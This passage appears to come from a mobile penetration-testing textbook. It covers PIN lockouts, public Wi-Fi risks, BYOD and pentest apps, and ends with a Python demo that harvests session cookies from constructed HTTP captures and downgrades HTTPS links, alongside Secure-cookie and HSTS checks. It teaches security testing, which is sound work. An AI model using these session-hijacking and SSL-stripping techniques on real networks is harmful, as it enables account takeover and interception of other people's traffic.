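A four-digit PIN at ten guesses per second is gone in under twenty minutes without a lockout and in about a day and a half with the constructed five-tries-then-sixty-seconds schedule; the point of the lockout is that it buys time for the owner to wipe the device remotely, not that it makes the PIN strong.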
Finding Unprotected Networks
One of the problems with mobile devices is the tendency for users to connect to unprotected or unknown wireless networks. There are many reasons why a mobile user might choose to connect to a network that they don’t know or don’t control.
For instance, a smartphone user might reason that, rather than burn through the precious data allowance that everyone but those on unlimited plans has to worry about, why not use free Wi-Fi instead?
Although the motivation makes sense, the danger of connecting to an unknown wireless network is considerable: whoever runs the access point, or anyone else attached to it, is in a position to observe or tamper with the device's unencrypted traffic, which can lead to identity theft, loss of privacy, or loss of data.
Thus, users of mobile devices should avoid attaching to unknown or uncontrolled wireless access points if at all possible. When there is no other option, it's a good idea to use one of the many VPN services on the Internet, which encrypt the device's traffic between it and the VPN provider and so put it out of reach of anyone on the local network.
Encountering Bring Your Own Device (BYOD)
BYOD is a trend that has gained support from both companies and their employees over the past half-dozen years or so, so you need to be aware of how the arrangement works and how it may affect your testing.
The simple concept behind the practice is that employees supply their own computers and equipment when they are hired.
The company itself owns and maintains a network, as well as all the backend equipment required to support it, such as servers, email, and other common infrastructure items; employees plug their own equipment into this company-supplied and -maintained network.
In practice, this typically means that individuals bring in their own devices in the form of notebooks and tablets, or even desktops in some cases.
Once these devices are on premises, the employee plugs them into the company's network, and provided everything checks out (the latest protection, patches, and other required items are in place), the device is allowed whatever access to the network the employee's job requires.
As good as this practice seems, flaws can still emerge, and these are the flaws you should be aware of as a pentester: they can be your points of opportunity for gaining access to the network itself.
What weakens security in this case is that maintaining a secure environment across all the devices employees bring in is difficult, given how diverse the client environment can be.
Equipment that the company does not own is hard to manage and monitor, and applying patches and providing support across so many different platforms is harder still.
A company may choose to place some limits on the type of equipment that employees can purchase or use in their environment, and will typically make policies clear as to what steps should be taken (such as implementing antimalware and other security measures).
Even with such policies and practices in place, IT departments by necessity will have to be extra vigilant about the security issues that can appear in such environments.
Choosing Tools to Test Mobile Devices
Pentesting mobile devices shares a lot with pentesting from traditional devices. The techniques are very similar if not identical, the concepts are the same in just about every case, and many of the tools found in non-mobile environments are present in the mobile environment as well.
When you look at the pentesting process from a mobile device, the process itself is identical, so you won't have to adapt to a brand-new one. The phases, from reconnaissance all the way through post-exploitation, look the same. The main differences are the platform being used (in this case, a mobile device) and perhaps some of the tools.
Initially, when mobile devices were introduced, the number of tools that could be used for pentesting was quite limited. Many of the tools were designed to do network troubleshooting and perhaps look for wireless networks, but not much more beyond that.
However, as time has moved forward, more tools have become available, and pentesters can now build a highly customized toolset tailored to their own liking.
If you use Kali NetHunter as your pentest environment, you avoid the work of hunting down and verifying your own tools. You may also choose to start from a preconfigured pentest environment such as NetHunter and install your own choice of tools on top of it.
In any case, the potential to highly customize the mobile environment to your own needs is advantageous to you as a pentester.
The following list of tools illustrates some of the items that are available to you as a pentester to use within the mobile environment, but it’s not an exhaustive list by any means. It is only meant to introduce you to some of the possibilities for tools that exist for performing pentesting.
IPTools by NetworkByte is a collection of tools used to provide information about different properties of the network, such as routing information, DNS settings, IP configuration, and more.
Mobile Nmap, by Gao Feng, is just like the name implies: a mobile version of the powerful nmap port and network scanner.
Shark for Root, by Elviss Kuštans, is essentially a scaled-down version of Wireshark for Android.
Session Hijacking Tools
Droidsheep, by Andrew Koch, works as a session hijacker for nonencrypted sites: it captures the session cookies of users on the same Wi-Fi network who are browsing over plain HTTP, lets you take over those sessions, and allows you to save cookies, files, and sessions for later analysis.
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over Wi-Fi networks.
SSLStrip, by NotExists, is an app used to target SSL-enabled sessions. Sitting in the middle of the victim's traffic, it rewrites the HTTPS links and redirects that a site hands out into plain HTTP, so the victim's browser never establishes the protected session and the attacker sees the data in the clear. (Sites that send an HSTS policy, and browsers with preloaded HSTS lists, resist this downgrade.)
SandroProxy is an Android app used to route traffic through a preselected proxy, which can be used to obscure the origin of an attack.
Psiphon is not really a proxy tool but a VPN technology that can be used to protect traffic to and from a mobile device.
Orbot is a free proxy app that empowers other apps to use the Internet more securely.
Orweb is a browser specifically designed to work with Orbot and is free.
Incognito is a web browser built for private browsing.
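The Droidsheep, FaceNiff, and SSLStrip entries above all rest on the same primitive: on a shared Wi-Fi network, a session cookie sent over plain HTTP is readable by anyone sniffing, and an attacker relaying a page can rewrite its HTTPS links so the next request is plaintext too. The following is an added example, not code from the book or from any of the tools listed; the captured requests, hosts, and cookie values are constructed, and the function names (harvest_sessions, downgrade_links, cookie_exposed_on_http, hsts_protects) and the session-cookie name pattern are assumptions for illustration. It shows what a hijacker extracts from sniffed traffic, the one-step link downgrade at the heart of SSL stripping, and the two response-side checks (the Secure cookie attribute and HSTS) that decide whether a site is exposed.

```python
"""Added example: what a Wi-Fi session hijacker sees, and what closes the hole.

Three plaintext HTTP requests are embedded below as a constructed stand-in
for traffic sniffed on a shared wireless network. harvest_sessions() pulls
out the session cookies a DroidSheep/FaceNiff-style tool would replay;
downgrade_links() is the core of an SSL-stripping attack on a page the
attacker relays; cookie_exposed_on_http() and hsts_protects() are the checks
that show whether a site is vulnerable. Hosts and values are made up.
"""
import re

# Constructed captures: one request per TCP stream, as seen on the wire.
CAPTURED_REQUESTS = [
    "GET /inbox HTTP/1.1\r\nHost: mail.example.test\r\n"
    "Cookie: SESSIONID=9f3c1a7e; lang=en\r\n\r\n",
    "GET /img/logo.png HTTP/1.1\r\nHost: cdn.example.test\r\n\r\n",
    "POST /api/post HTTP/1.1\r\nHost: social.example.test\r\n"
    "Cookie: sid=abc123; csrf=zz\r\nContent-Length: 0\r\n\r\n",
]

# Cookie names that usually carry an authenticated session (assumed pattern).
SESSION_NAME = re.compile(r"^(sess|sid|phpsessid|jsessionid|auth|token)", re.I)


def parse_request(raw):
    """Return (host, headers, cookies) for one plaintext HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    return headers.get("host", ""), headers, cookies


def harvest_sessions(requests):
    """Map host -> session-looking cookies: the material a hijacker replays
    from their own browser to become the victim."""
    found = {}
    for raw in requests:
        host, _, cookies = parse_request(raw)
        sess = {k: v for k, v in cookies.items() if SESSION_NAME.match(k)}
        if sess:
            found.setdefault(host, {}).update(sess)
    return found


def downgrade_links(html):
    """SSL stripping in one step: rewrite every https:// link in a page the
    attacker is relaying to http://, so the victim's browser never starts a
    TLS session and its next request (cookies included) goes out in the clear."""
    return re.sub(r"https://", "http://", html, flags=re.I)


def cookie_exposed_on_http(set_cookie_header):
    """True if a cookie set with this header would be sent on a plain-HTTP
    request (no Secure attribute), i.e. harvestable by the code above."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "secure" not in attrs


def hsts_protects(response_headers):
    """True if the response carries a live HSTS policy, which makes the
    browser refuse the downgraded http:// links on later visits."""
    value = response_headers.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", value)
    return bool(m) and int(m.group(1)) > 0


if __name__ == "__main__":
    print(harvest_sessions(CAPTURED_REQUESTS))
    print(downgrade_links('<a href="https://mail.example.test/login">Log in</a>'))
    print(cookie_exposed_on_http("SESSIONID=9f3c1a7e; Path=/; HttpOnly"))
    print(cookie_exposed_on_http("SESSIONID=9f3c1a7e; Path=/; Secure; HttpOnly"))
```

The CDN request carries no cookie and drops out; the two authenticated requests yield one replayable session each. Note that HttpOnly does nothing against this attack, since the cookie is read off the wire rather than from script; only the Secure attribute keeps it off plain HTTP, and only HSTS stops the browser from following the downgraded links in the first place.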